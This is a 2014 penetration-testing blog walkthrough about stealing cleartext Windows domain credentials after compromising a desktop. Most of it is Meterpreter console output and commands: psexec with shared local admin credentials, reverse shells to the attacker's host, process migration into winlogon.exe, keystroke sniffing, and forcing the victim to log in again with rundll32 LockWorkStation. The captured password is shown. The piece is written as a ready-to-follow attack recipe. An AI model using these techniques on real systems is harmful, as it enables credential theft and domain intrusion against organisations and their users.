Blog: How-Tos

Keylogging domain creds; who needs a hash? Lock the victim’s workstation to order and snarf them immediately

Chris Pickering 03 Mar 2014

So, recently I was onsite on a client network, I had compromised the local desktop and had the local administrator password. There was only one set of domain cached creds and these were not cracked, indicating a strong domain password policy. The servers were out of scope for this assessment – so how to elevate privilege on the domain?

Using our local admin (more than likely shared over multiple desktop machines) we can scan the attached subnet for machines names and logged on users using wmic as follows:

C:\Users\chris>wmic /node:127.0.0.1 computersystem GET name, username
Name UserName
CHRIS-WIN7 chris-win7\chris

Next we pick our target: maybe the IT manager/HR manager is on the same subnet if lucky. If not, target any user to gain a leverage on the domain.

Using our shared local admin creds and the psexec function of Metasploit we throw over a connect back: time for some fun!

Get your keylogger running in the winlogon process on the target machine. Then pop a second Meterpreter session, migrate to explorer.exe and use rundll LockWorkStation.

Result? The workstation locks, the user is forced to log in and you get their clear text domain credentials on a plate.

Would they be suspicious? I’m not sure. It’s certainly quicker than leaving your shell open for ages, waiting for the lucky logging of their creds.

If they follow bad practice and rarely lock their workstation, then you might end up waiting all day for those creds. All time that your shell might get detected, so speed up the snarfing!

Here’s how:

Get your shell connected:

[*] Meterpreter session 1 opened (192.168.135.11:80 -> 192.168.131.92:53262)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

Check running processes, note explorer.exe and winlogon:

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process} 4294967295
4 0 System x86_64 0
348 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
364 6064 winlogon.exe x86_64 2 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
380 564 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\vmnat.exe
<.cut.>
5412 6448 SnagPriv.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\SnagPriv.exe
5512 1020 dwm.exe x86_64 2 EU\x.x C:\Windows\System32\dwm.exe
5664 5860 explorer.exe x86_64 2 EU\x.x C:\Windows\explorer.exe
6016 5560 PccNTMon.exe x86_64 2 EU\x.x C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTMon.exe
<. cut. >

Migrate to explorer.exe for everyday sniffing:

meterpreter > migrate 5664
[*] Migrating from 1596 to 5664…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer..

meterpreter > keyscan_dump
Dumping captured keystrokes…
Dear Dave blah blah blah.

Is this guy ever going to enter his domain creds?

To grab user creds migrate to winlogon.exe:

meterpreter > migrate 364
[*] Migrating from 5664 to 364…
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > background

Now you have to wait for them to lock their screen and logon again… but why not lock their screen for them… so, pop another Meterpreter session, move to explorer.exe and issue a rundll LockWorkStation command as follows:

[*] Meterpreter session 12 opened (192.168.135.11:80 – > 192.168.131.92:54370)
msf exploit(handler) > sessions -i 12
[*] Starting interaction with 12…

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295

4 0 System x86_64 0

<. cut. >
5664 5860 explorer.exe x86_64 2 EU\x.x C:\Windows\explorer.exe
6016 5560 PccNTMon.exe x86_64 2 EU\x.x C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTMon.exe
6340 6448 TscHelp.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\TSCHelp.exe
6448 5664 Snagit32.exe x86 2 EU\x.x C:\Program Files (x86)\TechSmith\Snagit 10\Snagit32.exe
<. cut. >

meterpreter > migrate 5664
[*] Migrating from 5212 to 5664…
[*] Migration completed successfully.
meterpreter > shell
Process 3868 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>rundll32.exe user32.dll, LockWorkStation
rundll32.exe user32.dll, LockWorkStation

C:\Windows\system32>exit

Now go back to your original shell and keylog the winlogon.exe process:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > keyscan_dump
Dumping captured keystrokes…
<Ctrl> <LCtrl> <LMenu> <Alt> <Delete> <Back> <Back> 1$uper$trongPassword$1 <Return>

WIN!!